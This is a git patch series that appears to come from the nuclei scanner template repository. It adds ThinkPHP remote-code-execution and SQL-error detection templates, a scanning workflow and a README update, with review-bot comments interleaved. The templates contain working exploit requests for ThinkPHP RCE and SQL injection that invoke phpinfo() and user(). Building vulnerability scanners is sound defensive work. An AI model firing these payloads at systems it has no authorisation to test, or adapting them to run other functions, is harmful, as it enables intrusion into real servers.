From: parrot Date: Tue, 19 Jan 2021 01:16:59 -0300 Subject: [PATCH 81/85] Added ThinkPHP templates and signature. --- technologies/tech-detect.yaml | 9 ++++++- vulnerabilities/thinkphp/thinkphp-2-rce.yaml | 24 +++++++++++++++++ .../thinkphp/thinkphp-5022-rce.yaml | 24 +++++++++++++++++ .../thinkphp/thinkphp-5023-rce.yaml | 27 +++++++++++++++++++ .../thinkphp-509-information-disclosure.yaml | 24 +++++++++++++++++ 5 files changed, 107 insertions(+), 1 deletion(-) create mode 100755 vulnerabilities/thinkphp/thinkphp-2-rce.yaml create mode 100755 vulnerabilities/thinkphp/thinkphp-5022-rce.yaml create mode 100755 vulnerabilities/thinkphp/thinkphp-5023-rce.yaml create mode 100755 vulnerabilities/thinkphp/thinkphp-509-information-disclosure.yaml diff --git a/technologies/tech-detect.yaml b/technologies/tech-detect.yaml index 033288a3b9..626619380e 100644 --- a/technologies/tech-detect.yaml +++ b/technologies/tech-detect.yaml @@ -2746,4 +2746,11 @@ requests: name: monit part: header words: - - 'Server: monit' \ No newline at end of file + - 'Server: monit' + + - type: word + name: thinkphp + words: + - "ThinkPHP" + part: header + diff --git a/vulnerabilities/thinkphp/thinkphp-2-rce.yaml b/vulnerabilities/thinkphp/thinkphp-2-rce.yaml new file mode 100755 index 0000000000..afa7ffce70 --- /dev/null +++ b/vulnerabilities/thinkphp/thinkphp-2-rce.yaml @@ -0,0 +1,24 @@ +id: thinkphp-2-rce + +info: + name: ThinkPHP 5.0.22 RCE + author: dr_set + severity: critical + description: ThinkPHP 2.x version and 3.0 in Lite mode Remote Code Execution. + + # reference: https://github.com/vulhub/vulhub/tree/0a0bc719f9a9ad5b27854e92bc4dfa17deea25b4/thinkphp/2-rce + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?s=/index/index/name/$%7B@phpinfo()%7D" + matchers-condition: and + matchers: + - type: word + words: + - "PHP Extension" + - "PHP Version" + condition: and + - type: status + status: + - 200 
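Review bot: `name: ThinkPHP 5.0.22 RCE` in the new thinkphp-2-rce.yaml contradicts its `id: thinkphp-2-rce` and its description (ThinkPHP 2.x and 3.0 in Lite mode); it appears copied from thinkphp-5022-rce.yaml, which carries the identical name, and the later syntax-update commit touches only the reference line. Suggest `name: ThinkPHP 2.x / 3.0 Lite RCE` so reports distinguish the two checks. The `# reference:` comment is already promoted to a real `reference:` key by the follow-up commit, so nothing further is needed there.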
diff --git a/vulnerabilities/thinkphp/thinkphp-5022-rce.yaml b/vulnerabilities/thinkphp/thinkphp-5022-rce.yaml new file mode 100755 index 0000000000..a3b53096d2 --- /dev/null +++ b/vulnerabilities/thinkphp/thinkphp-5022-rce.yaml @@ -0,0 +1,24 @@ +id: thinkphp-5022-rce + +info: + name: ThinkPHP 5.0.22 RCE + author: dr_set + severity: critical + description: Thinkphp5 5.0.22/5.1.29 Remote Code Execution if the website doesn't have mandatory routing enabled (which is default). + + # reference: https://github.com/vulhub/vulhub/tree/0a0bc719f9a9ad5b27854e92bc4dfa17deea25b4/thinkphp/5-rce + +requests: + - method: GET + path: + - "{{BaseURL}}?s=index/think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1" + matchers-condition: and + matchers: + - type: word + words: + - "PHP Extension" + - "PHP Version" + condition: and + - type: status + status: + - 200 diff --git a/vulnerabilities/thinkphp/thinkphp-5023-rce.yaml b/vulnerabilities/thinkphp/thinkphp-5023-rce.yaml new file mode 100755 index 0000000000..d1a545672e --- /dev/null +++ b/vulnerabilities/thinkphp/thinkphp-5023-rce.yaml @@ -0,0 +1,27 @@ +id: thinkphp-5023-rce + +info: + name: ThinkPHP 5.0.23 RCE + author: dr_set + severity: critical + description: Thinkphp5 5.0(<5.0.24) Remote Code Execution. + + # reference: https://github.com/vulhub/vulhub/tree/0a0bc719f9a9ad5b27854e92bc4dfa17deea25b4/thinkphp/5.0.23-rce + +requests: + - method: POST + path: + - "{{BaseURL}}/index.php?s=captcha" + headers: + Content-Type: application/x-www-form-urlencoded + body: "_method=__construct&filter[]=phpinfo&method=get&server[REQUEST_METHOD]=1" + matchers-condition: and + matchers: + - type: word + words: + - "PHP Extension" + - "PHP Version" + condition: and + - type: status + status: + - 200 \ No newline at end of file 
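Review bot: thinkphp-5022-rce.yaml builds its request as `{{BaseURL}}?s=...`, whereas the sibling templates added in the same commit use `{{BaseURL}}/index.php?s=...`; without a separating slash the query is appended directly to whatever the supplied BaseURL ends with, so the effective URL depends on whether the target carries a trailing slash or a path component. For consistency and predictable routing, prefix the path with `/` (i.e. `{{BaseURL}}/?s=...`) unless the author verified that the bare form is required by the vulnerable router. The thinkphp-5023-rce.yaml hunk in the same span is consistent with the others apart from its missing trailing newline.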
diff --git a/vulnerabilities/thinkphp/thinkphp-509-information-disclosure.yaml b/vulnerabilities/thinkphp/thinkphp-509-information-disclosure.yaml new file mode 100755 index 0000000000..82ed0747f9 --- /dev/null +++ b/vulnerabilities/thinkphp/thinkphp-509-information-disclosure.yaml @@ -0,0 +1,24 @@ +id: thinkphp-509-information-disclosure + +info: + name: ThinkPHP 5.0.9 Information Disclosure + author: dr_set + severity: critical + description: Verbose SQL error message reveals sensitive information including database credentials. + + # reference: https://github.com/vulhub/vulhub/tree/0a0bc719f9a9ad5b27854e92bc4dfa17deea25b4/thinkphp/in-sqlinjection + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?ids[0,updatexml(0,concat(0xa,user()),0)]=1" + matchers-condition: and + matchers: + - type: word + words: + - "SQLSTATE" + - "XPATH syntax error" + condition: and + - type: status + status: + - 500 From 1a14ff8c44716bac964ed39a4414b120a8034cc9 Mon Sep 17 00:00:00 2001 From: PD-Team <8293321+bauthard@users.noreply.github.com> Date: Tue, 19 Jan 2021 12:33:48 +0530 Subject: [PATCH 82/85] syntax update --- technologies/tech-detect.yaml | 5 ++--- vulnerabilities/thinkphp/thinkphp-2-rce.yaml | 3 +-- vulnerabilities/thinkphp/thinkphp-5022-rce.yaml | 3 +-- vulnerabilities/thinkphp/thinkphp-5023-rce.yaml | 3 +-- .../thinkphp/thinkphp-509-information-disclosure.yaml | 5 ++--- 5 files changed, 7 insertions(+), 12 deletions(-) diff --git a/technologies/tech-detect.yaml b/technologies/tech-detect.yaml index 626619380e..dcab4a8bff 100644 --- a/technologies/tech-detect.yaml +++ b/technologies/tech-detect.yaml @@ -2747,10 +2747,9 @@ requests: part: header words: - 'Server: monit' - + - type: word name: thinkphp words: - "ThinkPHP" - part: header - + part: header \ No newline at end of file diff --git a/vulnerabilities/thinkphp/thinkphp-2-rce.yaml b/vulnerabilities/thinkphp/thinkphp-2-rce.yaml index afa7ffce70..fed9db9cbf 100755 
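Review bot: thinkphp-509-information-disclosure.yaml is rated `severity: critical` and its description states that database credentials are revealed, but the matchers only confirm a verbose error response (`SQLSTATE` and `XPATH syntax error` with status 500); nothing in the template verifies that credentials actually appear in the body. Either align the description with what is checked, e.g. `description: Verbose SQL error page exposed; ThinkPHP debug output may include database connection details.`, and reconsider the rating, or state in `reference`/`description` why the error page alone justifies critical. The same file is edited again by the syntax-update commit, which leaves the rating and description unchanged.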
--- a/vulnerabilities/thinkphp/thinkphp-2-rce.yaml +++ b/vulnerabilities/thinkphp/thinkphp-2-rce.yaml @@ -5,8 +5,7 @@ info: author: dr_set severity: critical description: ThinkPHP 2.x version and 3.0 in Lite mode Remote Code Execution. - - # reference: https://github.com/vulhub/vulhub/tree/0a0bc719f9a9ad5b27854e92bc4dfa17deea25b4/thinkphp/2-rce + reference: https://github.com/vulhub/vulhub/tree/0a0bc719f9a9ad5b27854e92bc4dfa17deea25b4/thinkphp/2-rce requests: - method: GET diff --git a/vulnerabilities/thinkphp/thinkphp-5022-rce.yaml b/vulnerabilities/thinkphp/thinkphp-5022-rce.yaml index a3b53096d2..3fde3a1ce7 100755 --- a/vulnerabilities/thinkphp/thinkphp-5022-rce.yaml +++ b/vulnerabilities/thinkphp/thinkphp-5022-rce.yaml @@ -5,8 +5,7 @@ info: author: dr_set severity: critical description: Thinkphp5 5.0.22/5.1.29 Remote Code Execution if the website doesn't have mandatory routing enabled (which is default). - - # reference: https://github.com/vulhub/vulhub/tree/0a0bc719f9a9ad5b27854e92bc4dfa17deea25b4/thinkphp/5-rce + reference: https://github.com/vulhub/vulhub/tree/0a0bc719f9a9ad5b27854e92bc4dfa17deea25b4/thinkphp/5-rce requests: - method: GET diff --git a/vulnerabilities/thinkphp/thinkphp-5023-rce.yaml b/vulnerabilities/thinkphp/thinkphp-5023-rce.yaml index d1a545672e..775c09b546 100755 --- a/vulnerabilities/thinkphp/thinkphp-5023-rce.yaml +++ b/vulnerabilities/thinkphp/thinkphp-5023-rce.yaml @@ -5,8 +5,7 @@ info: author: dr_set severity: critical description: Thinkphp5 5.0(<5.0.24) Remote Code Execution. - - # reference: https://github.com/vulhub/vulhub/tree/0a0bc719f9a9ad5b27854e92bc4dfa17deea25b4/thinkphp/5.0.23-rce + reference: https://github.com/vulhub/vulhub/tree/0a0bc719f9a9ad5b27854e92bc4dfa17deea25b4/thinkphp/5.0.23-rce requests: - method: POST diff --git a/vulnerabilities/thinkphp/thinkphp-509-information-disclosure.yaml b/vulnerabilities/thinkphp/thinkphp-509-information-disclosure.yaml index 82ed0747f9..bb06b729d1 100755 
--- a/vulnerabilities/thinkphp/thinkphp-509-information-disclosure.yaml +++ b/vulnerabilities/thinkphp/thinkphp-509-information-disclosure.yaml @@ -5,9 +5,8 @@ info: author: dr_set severity: critical description: Verbose SQL error message reveals sensitive information including database credentials. - - # reference: https://github.com/vulhub/vulhub/tree/0a0bc719f9a9ad5b27854e92bc4dfa17deea25b4/thinkphp/in-sqlinjection - + reference: https://github.com/vulhub/vulhub/tree/0a0bc719f9a9ad5b27854e92bc4dfa17deea25b4/thinkphp/in-sqlinjection + requests: - method: GET path: From 936f01a84db00c2375abe8c960c3b58b34a6dcd5 Mon Sep 17 00:00:00 2001 From: PD-Team <8293321+bauthard@users.noreply.github.com> Date: Tue, 19 Jan 2021 15:05:55 +0530 Subject: [PATCH 83/85] adding thinkphp workflow --- workflows/thinkphp-workflow.yaml | 13 +++++++++++++ 1 file changed, 13 insertions(+) create mode 100644 workflows/thinkphp-workflow.yaml diff --git a/workflows/thinkphp-workflow.yaml b/workflows/thinkphp-workflow.yaml new file mode 100644 index 0000000000..8282437e2a --- /dev/null +++ b/workflows/thinkphp-workflow.yaml @@ -0,0 +1,13 @@ +id: thinkphp-workflow +info: + name: ThinkPHP Security Checks + author: dr_set + description: A simple workflow that runs all ThinkPHP related nuclei templates on a given target. + +workflows: + + - template: technologies/tech-detect.yaml + matchers: + - name: thinkphp + subtemplates: + - template: vulnerabilities/thinkphp/ \ No newline at end of file From 18ffc0c2674294e63f27e7ed13f68f55b393b8ee Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 19 Jan 2021 09:37:13 +0000 Subject: [PATCH 84/85] Auto Update README [Tue Jan 19 09:37:13 UTC 2021] :robot: --- README.md | 10 ++++++++-- 1 file changed, 8 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 4ce6d72fc7..c5b20c6609 100644 --- a/README.md +++ b/README.md 
@@ -34,7 +34,7 @@ An overview of the nuclei template directory including number of templates assoc | fuzzing | 5 | helpers | 3 | | miscellaneous | 14 | misconfiguration | 37 | | takeovers | 1 | technologies | 44 | -| vulnerabilities | 62 | workflows | 16 | +| vulnerabilities | 66 | workflows | 17 | **Tree structure of nuclei templates:** @@ -534,6 +534,11 @@ An overview of the nuclei template directory including number of templates assoc │   ├── springboot │   │   ├── springboot-actuators-jolokia-xxe.yaml │   │   └── springboot-h2-db-rce.yaml +│   ├── thinkphp +│   │   ├── thinkphp-2-rce.yaml +│   │   ├── thinkphp-5022-rce.yaml +│   │   ├── thinkphp-5023-rce.yaml +│   │   └── thinkphp-509-information-disclosure.yaml │   ├── vmware │   │   ├── vmware-vcenter-lfi-linux.yaml │   │   └── vmware-vcenter-lfi.yaml @@ -568,13 +573,14 @@ An overview of the nuclei template directory including number of templates assoc ├── sap-netweaver-workflow.yaml ├── solarwinds-orion-workflow.yaml ├── springboot-workflow.yaml + ├── thinkphp-workflow.yaml ├── vbulletin-workflow.yaml └── wordpress-workflow.yaml ``` -**53 directories, 474 files**. +**54 directories, 479 files**. 📖 Documentation ----- From 741d05a4c0bae53aa9d735c1fc444b863c6ffd94 Mon Sep 17 00:00:00 2001 From: PD-Team <8293321+bauthard@users.noreply.github.com> Date: Tue, 19 Jan 2021 17:17:14 +0530 Subject: [PATCH 85/85] misc fix --- workflows/springboot-workflow.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/workflows/springboot-workflow.yaml b/workflows/springboot-workflow.yaml index 996a91be43..110835f2f1 100644 --- a/workflows/springboot-workflow.yaml +++ b/workflows/springboot-workflow.yaml @@ -10,7 +10,7 @@ info: workflows: - - template: security-misconfiguration/springboot-detect.yaml + - template: misconfiguration/springboot-detect.yaml subtemplates: - template: cves/2018/CVE-2018-1271.yaml - template: cves/2018/CVE-2018-1271.yaml
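Review bot: The subtemplates list in springboot-workflow.yaml contains `- template: cves/2018/CVE-2018-1271.yaml` twice in the visible context, so that template is scheduled twice for every host the detect step matches; drop the duplicate line. The commit only repairs the detect-template path, and the subtemplates list appears to continue beyond the hunk, so the remainder should be checked for further repeats.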